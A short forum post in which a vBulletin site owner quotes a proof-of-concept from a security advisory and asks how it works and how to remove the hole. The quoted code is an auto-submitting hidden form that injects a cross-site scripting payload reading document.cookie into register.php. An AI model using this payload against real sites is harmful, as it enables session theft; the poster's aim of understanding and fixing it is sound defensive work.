I have vBulletin installed on my site. A few hours ago a friend sent me a link to securityfocus.com. There, it is said that if i have vBulletin installed i could be vulnerable.
Here the script shown on the site.... [form action="http://[victim]/register.php?do=register"; method="post" style="display:none"] [input type="hidden" name="s" value="" /] [input type="hidden" name="regtype" value="1" /] [input type="text" class="bginput" name="field1" value="" size="25" maxlength="250" /] [input type="hidden" name="url" value="index.php" /] [input type="hidden" name="do" value="addmember" /] [/form] [script] //Code that will be executed var xss = "\"][script]alert(document"+".cookie)[\/script]"; document.forms[0].field1.value=xss; document.forms[0].submit(); [/script] *Replace ([],<>) The only problem that i have is that i do not know what the script does and how it works. PS: How can i get rid of this?
